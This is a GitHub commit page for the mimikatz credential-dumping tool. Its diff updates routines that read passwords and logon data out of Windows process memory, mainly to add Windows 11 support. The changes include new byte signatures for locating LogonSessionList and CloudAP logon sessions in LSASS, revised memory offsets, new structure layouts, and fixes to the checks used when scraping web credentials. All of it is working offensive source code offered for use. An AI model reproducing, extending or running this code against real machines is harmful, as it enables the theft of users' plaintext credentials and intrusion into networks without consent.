Skip to content

Commit

Permalink
[fix] mimikatz ts::logonpasswords search routines for Web credentials…
Browse files Browse the repository at this point in the history
…, thank you Lawrence Abrams (@Bleeping)
  • Loading branch information
gentilkiwi committed Aug 9, 2021
1 parent 8c125e9 commit d05fa5d
Show file tree
Hide file tree
Showing 7 changed files with 27 additions and 7 deletions.
3 changes: 2 additions & 1 deletion inc/globals.h
Original file line number Diff line number Diff line change
Expand Up @@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_MIN_BUILD_7 7000
#define KULL_M_WIN_MIN_BUILD_8 8000
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_11 22000
7 changes: 3 additions & 4 deletions mimikatz/modules/kuhl_m_ts.c
Original file line number Diff line number Diff line change
Expand Up @@ -272,14 +272,13 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
{
pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr;
if(
(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
(pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000))
&&
(pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t)))))
)
{

if(
(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
(pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000))
&&
(pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t)))))
)
Expand All @@ -289,7 +288,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION
ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address);

if(
(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
(pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000))
&&
(pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t)))))
)
Expand Down
2 changes: 1 addition & 1 deletion mimikatz/modules/ngc/kuhl_m_ngc.c
Original file line number Diff line number Diff line change
Expand Up @@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[])
{
if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule))
{
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near
if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager)))
{
aRemote.address = containerManager.unk7;
Expand Down
2 changes: 2 additions & 0 deletions mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74};
BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
Expand All @@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}},
{KULL_M_WIN_MIN_BUILD_11, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}},
};
#elif defined(_M_IX86)
BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};
Expand Down
2 changes: 2 additions & 0 deletions mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
Original file line number Diff line number Diff line change
Expand Up @@ -7,8 +7,10 @@

#if defined(_M_X64)
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75};
BYTE PTRN_WN11_CloudApLocateLogonSession[] = {0x48, 0x8b, 0xd1, 0x49, 0x3b, 0xc1, 0x75};
KULL_M_PATCH_GENERIC CloudApReferences[] = {
{KULL_M_WIN_BUILD_10_1909, {sizeof(PTRN_WALL_CloudApLocateLogonSession), PTRN_WALL_CloudApLocateLogonSession}, {0, NULL}, {-9}},
{KULL_M_WIN_MIN_BUILD_11, {sizeof(PTRN_WN11_CloudApLocateLogonSession), PTRN_WN11_CloudApLocateLogonSession}, {0, NULL}, {-4}},
};
#elif defined(_M_IX86)
BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x8b, 0x31, 0x39, 0x72, 0x10, 0x75};
Expand Down
17 changes: 16 additions & 1 deletion mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
Original file line number Diff line number Diff line change
Expand Up @@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY {
DWORD64 unk3;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;
} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY;

typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink;
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink;
DWORD unk0;
DWORD unk1;
DWORD unk2;
LUID LocallyUniqueIdentifier;
DWORD unk3;
DWORD unk4;
DWORD unk5;
DWORD unk6;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
1 change: 1 addition & 0 deletions modules/kull_m_memory.c
Original file line number Diff line number Diff line change
Expand Up @@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN
kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE);
break;
default:
SetLastError(ERROR_NOT_SUPPORTED);
break;
}
return (Address->address) != NULL;
Expand Down

0 comments on commit d05fa5d

Please sign in to comment.